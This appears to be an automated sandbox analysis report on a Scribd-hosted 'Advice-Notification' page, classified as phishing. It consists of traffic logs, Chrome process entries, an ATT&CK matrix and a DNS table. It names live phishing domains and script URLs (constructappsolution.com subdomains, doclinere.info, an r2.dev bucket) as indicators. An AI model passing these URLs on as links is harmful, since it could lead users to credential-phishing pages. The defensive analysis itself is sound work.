    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
    Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
    Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
    Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
    Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
    Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49729 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49947 version: TLS 1.2
    Source: classification engineClassification label: mal68.phis.win@26/272@224/71
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1788,i,12476349123992413655,12045162974044281250,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1788,i,12476349123992413655,12045162974044281250,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    3
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embed0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://rphfymzrfvbgvnwbxgqz.constructappsolution.com/0%Avira URL Cloudsafe
    https://cdn-assets-prod.s3.amazonaws.com/js/preview2/24721610109.js0%Avira URL Cloudsafe
    https://drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
    https://doclinere.info/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    browser.sentry-cdn.com
    151.101.194.217
    truefalse
      high
      d-ams1.turn.com
      46.228.164.13
      truefalse
        high
        live.rezync.com
        13.226.2.62
        truefalse
          high
          platform.twitter.map.fastly.net
          151.101.120.157
          truefalse
            high
            rphfymzrfvbgvnwbxgqz.constructappsolution.com
            104.21.89.87
            truefalse
              high
              stats.g.doubleclick.net
              64.233.167.154
              truefalse
                high
                livepixel-production.bln.liveintent.com
                44.221.168.224
                truefalse
                  high
                  t.co
                  162.159.140.229
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      idaas-ext.cph.liveintent.com
                      52.73.207.134
                      truefalse
                        high
                        stripe.com
                        52.30.58.64
                        truefalse
                          high
                          office.com
                          13.107.6.156
                          truefalse
                            high
                            sni1gl.wpc.omegacdn.net
                            152.199.21.175
                            truefalse
                              high
                              www.google.com
                              142.250.181.100
                              truefalse
                                high
                                match.adsrvr.org
                                35.71.131.137
                                truefalse
                                  high
                                  drizzysamson.constructappsolution.com
                                  104.21.89.87
                                  truefalse
                                    high
                                    star-mini.c10r.facebook.com
                                    157.240.195.35
                                    truefalse
                                      high
                                      google.com
                                      172.217.17.78
                                      truefalse
                                        high
                                        nydc1.outbrain.org
                                        70.42.32.95
                                        truefalse
                                          high
                                          s.twitter.com
                                          104.244.42.131
                                          truefalse
                                            high
                                            maxcdn.bootstrapcdn.com
                                            104.18.10.207
                                            truefalse
                                              high
                                              detgh1asa1dg4.cloudfront.net
                                              3.164.182.6
                                              truefalse
                                                unknown
                                                dualstack.reddit.map.fastly.net
                                                151.101.193.140
                                                truefalse
                                                  high
                                                  cdn.optimizely.com
                                                  104.18.66.57
                                                  truefalse
                                                    high
                                                    prdsurvey.b-cdn.net
                                                    89.35.237.170
                                                    truefalse
                                                      high
                                                      reddit.map.fastly.net
                                                      151.101.1.140
                                                      truefalse
                                                        high
                                                        googleads.g.doubleclick.net
                                                        172.217.19.226
                                                        truefalse
                                                          high
                                                          m.stripe.com
                                                          35.164.166.224
                                                          truefalse
                                                            high
                                                            cos.na-siliconvalley.myqcloud.com
                                                            170.106.97.198
                                                            truefalse
                                                              high
                                                              consent.api.osano.com
                                                              52.222.144.7
                                                              truefalse
                                                                high
                                                                td.doubleclick.net
                                                                142.250.181.66
                                                                truefalse
                                                                  high
                                                                  mid.rkdms.com
                                                                  54.198.45.212
                                                                  truefalse
                                                                    high
                                                                    d1tcqh4bio8cty.cloudfront.net
                                                                    52.222.144.58
                                                                    truefalse
                                                                      unknown
                                                                      doclinere.info
                                                                      172.67.135.2
                                                                      truetrue
                                                                        unknown
                                                                        s-part-0035.t-0009.t-msedge.net
                                                                        13.107.246.63
                                                                        truefalse
                                                                          high
                                                                          spdc-global.pbp.gysm.yahoodns.net
                                                                          54.246.144.89
                                                                          truefalse
                                                                            high
                                                                            cdn.prod.gcp.sift.com
                                                                            34.96.67.224
                                                                            truefalse
                                                                              high
                                                                              scontent.xx.fbcdn.net
                                                                              157.240.195.15
                                                                              truefalse
                                                                                high
                                                                                utt.impactcdn.com
                                                                                35.186.249.72
                                                                                truefalse
                                                                                  high
                                                                                  code.jquery.com
                                                                                  151.101.2.137
                                                                                  truefalse
                                                                                    high
                                                                                    widget.nl3.vip.prod.criteo.com
                                                                                    178.250.1.9
                                                                                    truefalse
                                                                                      high
                                                                                      cdn.pdst.fm
                                                                                      35.244.142.80
                                                                                      truefalse
                                                                                        high
                                                                                        edge-web.dual-gslb.spotify.com
                                                                                        35.186.224.24
                                                                                        truefalse
                                                                                          high
                                                                                          stackpath.bootstrapcdn.com
                                                                                          104.18.11.207
                                                                                          truefalse
                                                                                            high
                                                                                            a.nel.cloudflare.com
                                                                                            35.190.80.1
                                                                                            truefalse
                                                                                              high
                                                                                              scribd.map.fastly.net
                                                                                              151.101.194.152
                                                                                              truefalse
                                                                                                high
                                                                                                sentry.io
                                                                                                35.186.247.156
                                                                                                truefalse
                                                                                                  high
                                                                                                  hexagon-analytics.com
                                                                                                  34.102.232.42
                                                                                                  truefalse
                                                                                                    high
                                                                                                    ax-0001.ax-msedge.net
                                                                                                    150.171.27.10
                                                                                                    truefalse
                                                                                                      high
                                                                                                      tattle.api.osano.com
                                                                                                      52.87.69.230
                                                                                                      truefalse
                                                                                                        high
                                                                                                        pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev
                                                                                                        172.66.0.235
                                                                                                        truetrue
                                                                                                          unknown
                                                                                                          d2gt2ux04o03l1.cloudfront.net
                                                                                                          18.165.220.127
                                                                                                          truefalse
                                                                                                            high
                                                                                                            dexeqbeb7giwr.cloudfront.net
                                                                                                            216.137.52.21
                                                                                                            truefalse
                                                                                                              high
                                                                                                              analytics.google.com
                                                                                                              172.217.17.46
                                                                                                              truefalse
                                                                                                                high
                                                                                                                ib.anycast.adnxs.com
                                                                                                                185.89.210.20
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  edge.gycpi.b.yahoodns.net
                                                                                                                  188.125.88.206
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    alb.reddit.com
                                                                                                                    unknown
                                                                                                                    unknownfalse
                                                                                                                      high
                                                                                                                      static.ads-twitter.com
                                                                                                                      unknown
                                                                                                                      unknownfalse
                                                                                                                        high
                                                                                                                        www.office.com
                                                                                                                        unknown
                                                                                                                        unknownfalse
                                                                                                                          high
                                                                                                                          wa.scribd.com
                                                                                                                          unknown
                                                                                                                          unknownfalse
                                                                                                                            high
                                                                                                                            drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com
                                                                                                                            unknown
                                                                                                                            unknownfalse
                                                                                                                              unknown
                                                                                                                              dis.criteo.com
                                                                                                                              unknown
                                                                                                                              unknownfalse
                                                                                                                                high
                                                                                                                                pixels.spotify.com
                                                                                                                                unknown
                                                                                                                                unknownfalse
                                                                                                                                  high
                                                                                                                                  www.redditstatic.com
                                                                                                                                  unknown
                                                                                                                                  unknownfalse
                                                                                                                                    high
                                                                                                                                    aadcdn.msftauth.net
                                                                                                                                    unknown
                                                                                                                                    unknownfalse
                                                                                                                                      high
                                                                                                                                      b-code.liadm.com
                                                                                                                                      unknown
                                                                                                                                      unknownfalse
                                                                                                                                        high
                                                                                                                                        connect.facebook.net
                                                                                                                                        unknown
                                                                                                                                        unknownfalse
                                                                                                                                          high
                                                                                                                                          s.yimg.com
                                                                                                                                          unknown
                                                                                                                                          unknownfalse
                                                                                                                                            high
                                                                                                                                            d.turn.com
                                                                                                                                            unknown
                                                                                                                                            unknownfalse
                                                                                                                                              high
                                                                                                                                              js.stripe.com
                                                                                                                                              unknown
                                                                                                                                              unknownfalse
                                                                                                                                                high
                                                                                                                                                sp.analytics.yahoo.com
                                                                                                                                                unknown
                                                                                                                                                unknownfalse
                                                                                                                                                  high
                                                                                                                                                  m.stripe.network
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    high
                                                                                                                                                    w3-reporting-nel.reddit.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      high
                                                                                                                                                      cdn.siftscience.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        high
                                                                                                                                                        pixel-config.reddit.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          high
                                                                                                                                                          www.facebook.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            high
                                                                                                                                                            i.liadm.com
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              high
                                                                                                                                                              cmp.osano.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                high
                                                                                                                                                                s-f.scribdassets.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  high
                                                                                                                                                                  analytics.twitter.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    high
                                                                                                                                                                    html.scribdassets.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      high
